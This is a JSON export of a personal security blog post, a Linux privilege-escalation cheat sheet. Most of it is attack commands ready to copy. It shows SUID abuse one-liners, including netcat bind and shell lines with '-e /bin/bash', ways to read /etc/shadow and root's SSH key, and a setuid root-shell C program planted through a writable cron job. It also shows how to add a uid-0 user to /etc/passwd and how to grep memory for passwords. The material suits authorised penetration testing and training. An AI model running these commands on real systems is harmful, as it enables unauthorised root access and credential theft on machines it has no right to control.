{"id":585,"date":"2020-01-21T21:52:26","date_gmt":"2020-01-21T20:52:26","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=585"},"modified":"2023-12-24T13:03:45","modified_gmt":"2023-12-24T12:03:45","slug":"privilege-escalation-linux","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=585","title":{"rendered":"Privilege Escalation Linux&nbsp;<span class=\"caps\">ALT<\/span>"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">1. Manual enumeration<\/h1>\n\n\n\n<pre class=\"wp-block-preformatted\">id\npwd\nuname -a \/\/ are there kernel exploits?\ncat \/etc\/hosts\ncat \/etc\/passwd\nls -lah \/etc\/passwd\ncat \/etc\/group\ncat \/etc\/fstab\ncat \/etc\/crontab\ndf\ncd \/home &amp;&amp; ls ... \/\/ or execute ls -lahR \/home\/\ncd \/root &amp;&amp; ls ...\nnetstat -antup\nps aux\nsudo -l\nsu \/\/ if passwords are already known\ntmux ls\nscreen -list\ncat \/proc\/self\/... &lt;- many interesting things.\nls \/proc\/self\/root &lt;- alternative path to the root dir!\nuname -a \/\/ =&gt; Check for Kernel exploits\nfind \/ -type f -user $currentUser 2&gt; \/dev\/null\n\n\/\/ Check which packages are installed, here for Debian\/Ubuntu\napt list --installed | grep -v automati\n\n\/\/ Enumerate applications, \/var\/www\/...\n\n\/\/ Go through all log files....\n\/\/ =&gt; Check syslog for CRON executions.<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1738\">=&gt; See this list of inter\u00adest\u00ading Lin\u00adux&nbsp;files.<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1630\">Here as&nbsp;well<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">2. Script enumeration<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Upload the _ex.tar file and begin to exe\u00adcute the enu\u00admer\u00ada\u00adtion scripts.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">3. Extended enumeration<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Go to these&nbsp;links.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Lin\u00adux <ul><li><a href=\"https:\/\/blog.g0tmi1k.com\/2011\/08\/basic-linux-privilege-escalation\/\">https:\/\/blog.g0tmi1k.com\/2011\/08\/basic-linux-privilege-escalation\/<\/a> <\/li><li><a href=\"https:\/\/www.ired.team\/offensive-security-experiments\/offensive-security-cheetsheets\">https:\/\/www.ired.team\/offensive-security-experiments\/offensive-security-cheetsheets<\/a><\/li><\/ul><\/li><li>Win\u00addows <ul><li><a href=\"http:\/\/www.fuzzysecurity.com\/tutorials\/16.html\">http:\/\/www.fuzzysecurity.com\/tutorials\/16.html<\/a> <\/li><\/ul><\/li><\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Various notes<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Techniques<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Helper scripts<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/mzet-\/linux-exploit-suggester\">https:\/\/github.com\/mzet-\/linux-exploit-suggester<\/a><\/li><li><a href=\"https:\/\/github.com\/jondonas\/linux-exploit-suggester-2\">https:\/\/github.com\/jondonas\/linux-exploit-suggester\u20112<\/a><\/li><li><a href=\"\/itsec\/?p=268\">Lin\u00adux Smart Enumeration<\/a><\/li><li><a href=\"https:\/\/github.com\/rebootuser\/LinEnum\">https:\/\/github.com\/rebootuser\/LinEnum<\/a><\/li><li><a href=\"https:\/\/github.com\/TH3xACE\/SUDO_KILLER\">https:\/\/github.com\/TH3xACE\/<span class=\"caps\">SUDO_KILLER<\/span><\/a><\/li><li><a href=\"http:\/\/www.securitysift.com\/download\/linuxprivchecker.py\">linuxprivchecker.py<\/a>\n<ul>\n<li>Muss ggf. in Python 3\u2011Skript kon\u00advertiert werden.<\/li>\n<li>Muss evtl. angepasst wer\u00adden in Zeile 53: results = str(out, \u2018utf\u20118\u2019).split(\u201c\\n\u201d)<\/li>\n<\/ul>\n<\/li><li>https:\/\/github.com\/carlospolop\/privilege-escalation-awesome-scripts-suite<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Monitoring scripts<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/DominicBreuker\/pspy\">https:\/\/github.com\/DominicBreuker\/pspy<\/a>\n<ul>\n<li>Mon\u00adi\u00adtor\u00ading a sys\u00adtem. Can be open in a ter\u00admi\u00adnal to see if oth\u00ader users\/processes do&nbsp;stuff.<\/li>\n<li>If a user per\u00adforms sudo some\u00adwhere -&gt; <a href=\"https:\/\/github.com\/nongiach\/sudo_inject\">sudo_inject<\/a><\/li>\n<\/ul>\n<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Running root services<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>Check if vuner\u00ada\u00adbil\u00adi\u00adties are known for a run\u00adning process to fork a&nbsp;shell.&nbsp;<ul>\n<li>ps aux<\/li>\n<li>net\u00adstat \u2011antup<\/li>\n<li>lsof \u2011i<\/li>\n<\/ul>\n<\/li><li>Known soft\u00adware:\n<ul>\n<li><strong>MySQL<\/strong>: Could sup\u00adport shell com\u00admand (sys\u00adtem whoa\u00admi with\u00adin&nbsp;mysql)<\/li>\n<\/ul>\n<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Exploit <span class=\"caps\">SUID<\/span>&nbsp;files<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>Find them\n<ul>\n<li>\n<pre>find \/ -type f -user root -perm \/u+s -ls 2&gt;\/dev\/null\nfind \/ -user root -perm -4000 -print 2&gt;\/dev\/null\nfind \/ -perm -u=s -type f 2&gt;\/dev\/null\nfind \/ -user root -perm -4000 -exec ls -ldb {} \\;\nfind . -perm -o+r \/\/ find all world wide readable files.<\/pre>\n<\/li>\n<\/ul>\n<\/li><li>Check if vul\u00adner\u00ada\u00adbil\u00adi\u00adties are known or if they have a fea\u00adture to spawn a&nbsp;shell.<\/li><li><strong>Nmap<\/strong>:\n<ul>\n<li>\n<pre>nmap --interactive\n!sh<\/pre>\n<\/li>\n<\/ul>\n<\/li><li><strong>Net\u00adcat \/ nc<\/strong>:\n<ul>\n<li>\n<pre>nc -e \/bin\/bash 127.0.0.1 4444<\/pre>\n<\/li>\n<\/ul>\n<\/li><li><strong>awk \/ gawk<\/strong>:\n<ul>\n<li>\n<pre>awk '{ print }' \/etc\/shadow\nawk 'BEGIN {system(\"id\")}'<\/pre>\n<\/li>\n<\/ul>\n<\/li><li><strong>find<\/strong>:\n<ul>\n<li>\n<pre>find \/home -exec nc -lvp 4444 -e \/bin\/bash \\;\nfind \/home -exec \/bin\/bash \\;<\/pre>\n<\/li>\n<\/ul>\n<\/li><li><strong>strace<\/strong>:\n<ul>\n<li>\n<pre>Write and compile a a SUID SUID binary c++ program\nstrace chown root:root suid\nstrace chmod u+s suid\n.\/suid<\/pre>\n<\/li>\n<\/ul>\n<\/li><li><strong>npm<\/strong>:\n<ul>\n<li>\n<pre>ln -s \/etc\/shadow package.json &amp;&amp; sudo \/usr\/bin\/npm i *<\/pre>\n<\/li>\n<\/ul>\n<\/li><\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">=&gt; Check <a href=\"https:\/\/gtfobins.github.io\/\">https:\/\/gtfobins.github.io\/<\/a> for a huge list with oth\u00ader binaries!<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Cau\u00adtion:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Some bina\u00adries using less or oth\u00ader soft\u00adware for dis\u00adplay\u00ading con\u00adtent. If the ter\u00admi\u00adnal is height enough, then they exit direct\u00adly. Try to make the ter\u00admi\u00adnal very nar\u00adrow so that the pro\u00adgram has to to split the con\u00adtent to mul\u00adti\u00adple \u201cpages\u201d. Then, e.g. use !\/bin\/bash in the case of&nbsp;less.<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Exploit cronjobs<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>Check if \/etc\/crontab and \/etc\/cron.* files are write\u00adable directly.<\/li><li>Check if files which are called \/ sym\u00adlinked in the cron direc\u00adto\u00adries are writeable&nbsp;<ul>\n<li>Check for world-write\u00adable files with find \/ \u2011perm \u20112 \u2011type f 2&gt;\/dev\/null<\/li>\n<\/ul>\n<\/li><li>Exam\u00adple with C&nbsp;code:&nbsp;<ul>\n<li>If you can write some root crone file, you can e.g. cre\u00adate a c file like&nbsp;this:<\/li>\n<li>\n<pre>#include &lt;stdio.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;unistd.h&gt;\n\nint main(void) {\nsetuid(0);\nsetgid(0);\nsystem(\"\/bin\/bash\");\n}<\/pre>\n<\/li>\n<li>Com\u00adpile it here or whereev\u00ader: gcc root.sh; chmod u+s a.out<\/li>\n<li>Add the pro\u00adgram to a write\u00adable cron job&nbsp;like<\/li>\n<li>\n<pre>echo \u201cchown root:root \/tmp\/rootme; chmod u+s \/tmp\/rootme;\u201d&gt;\/...\/cron-logrotate.sh<\/pre>\n<\/li>\n<li>Wait until the script has run and $prof\u00adit.<\/li>\n<\/ul>\n<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Various<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>Check groups <ul><li>To find all files who belong\u00ading to a&nbsp;group:&nbsp;<ul><li> <pre>find \/ -group internal 2&gt; \/dev\/null<\/pre>  <\/li><\/ul><\/li><li>If the user is in the disk group, try&nbsp;this:&nbsp;<ul><li> <pre>debugfs \/dev\/sda debugfs: cat \/root\/.ssh\/id_rsa debugfs: cat \/etc\/shadow<\/pre>   <\/li><\/ul><\/li><\/ul><\/li><li>Check sudo\u00aders<\/li><li>Check all files in home directories<\/li><li>Find files to&nbsp;write:&nbsp;<ul><li> <pre>find . -writeable<\/pre> <\/li><li> <pre>find \/ -type f -writable -path \/sys -prune -o -path \/proc -prune -o -path \/usr -prune -o -path \/lib -prune -o -type d 2&gt;\/dev\/null<\/pre>  <\/li><\/ul><\/li><li>Find direc\u00adto\u00adries to&nbsp;write:&nbsp;<ul><li> <pre>find \/ -regextype posix-extended -regex \"\/(sys|srv|proc|usr|lib|var)\" -prune -o -type d -writable 2&gt;\/dev\/null<\/pre>  <\/li><\/ul><\/li><li>Pass\u00adword checking:&nbsp;<ul><li>Check for files con\u00adtain\u00ading <span class=\"caps\">PASSWORD<\/span>&nbsp;<ul><li> <pre>grep --color=auto -rnw '\/' -ie \"PASSWORD\" --color=always 2&gt; \/dev\/null find . -type f -exec grep -i -I \"PASSWORD\" {} \/dev\/null \\;<\/pre>  <\/li><\/ul><\/li><li>Scan the mem\u00ado\u00adry for <span class=\"caps\">PASSWORD<\/span>&nbsp;<ul><li> <pre>strings <span class=\"pl-k\">\/<\/span>dev<span class=\"pl-k\">\/<\/span>mem <span class=\"pl-k\">-<\/span>n10 <span class=\"pl-k\">|<\/span> grep <span class=\"pl-k\">-<\/span>i PASS<\/pre>  <\/li><\/ul><\/li><li>Check files with <span class=\"caps\">PASSWORD<\/span>&nbsp;<ul><li> <pre>locate password<\/pre>   <\/li><\/ul><\/li><\/ul><\/li><li>Deter\u00admine sys\u00adtem timers to see what is exe\u00adcute auto\u00admat\u00adi\u00adcal\u00adly the next&nbsp;time:&nbsp;<ul><li> <pre>systemctl list<span class=\"pl-k\">-<\/span>timers <span class=\"pl-k\">--<\/span>all<\/pre>  <\/li><\/ul><\/li><li>If a user on the sys\u00adtem per\u00adformed sudo a short time ago, use <a href=\"https:\/\/github.com\/nongiach\/sudo_inject\">https:\/\/github.com\/nongiach\/sudo_inject<\/a><\/li><li>Can we read emails in \/var\/mail\/?<\/li><li>Check files between a time window:&nbsp;<ul><li> <pre>find \/ -newermt 2020-01-02 ! -newermt 2020-02-01 2&gt; \/dev\/null<\/pre>  <\/li><\/ul><\/li><li>Is \/etc\/passwd writeable?&nbsp;<ul><li>If yes, change a pass\u00adwords user or add a new root user (pass\u00adword can be set with <em>openssl pass\u00adwd evil<\/em>)<\/li><li> <pre>echo \"root2:AK24fcSx2Il3I:0:0:root:\/root:\/bin\/bash\" &gt;&gt; \/etc\/passwd<\/pre>  <\/li><\/ul><\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=538\" data-type=\"post\" data-id=\"538\">Do mem\u00ado\u00adry inves\u00adti\u00adga\u00adtion.<\/a> Dump mem\u00ado\u00adry from inter\u00adest\u00ading process\u00ades and grep\/strings them.<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Collections<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li>http:\/\/blog.g0tmi1k.com\/2011\/08\/basic-linux-privilege-escalation\/<\/li><\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1. Man\u00adu\u00adal enu\u00admer\u00ada\u00adtion id pwd uname \u2011a \/\/ are there ker\u00adnel exploits? cat \/etc\/hosts cat \/etc\/passwd ls \u2011lah \/etc\/passwd cat \/etc\/group cat \/etc\/fstab cat \/etc\/crontab df cd \/home <span class=\"amp\">&amp;<\/span><span class=\"amp\">&amp;<\/span> ls \u2026 \/\/ or exe\u00adcute ls \u2011lahR \/home\/ cd \/root <span class=\"amp\">&amp;<\/span><span class=\"amp\">&amp;<\/span> ls \u2026 net\u00adstat \u2011antup ps aux sudo \u2011l su \/\/ if pass\u00adwords are already known&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471],"tags":[33,53],"class_list":["post-585","post","type-post","status-publish","format-standard","hentry","category-privesc","tag-linux","tag-privilege-escalation"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/585","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=585"}],"version-history":[{"count":49,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/585\/revisions"}],"predecessor-version":[{"id":2305,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/585\/revisions\/2305"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=585"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=585"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=585"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}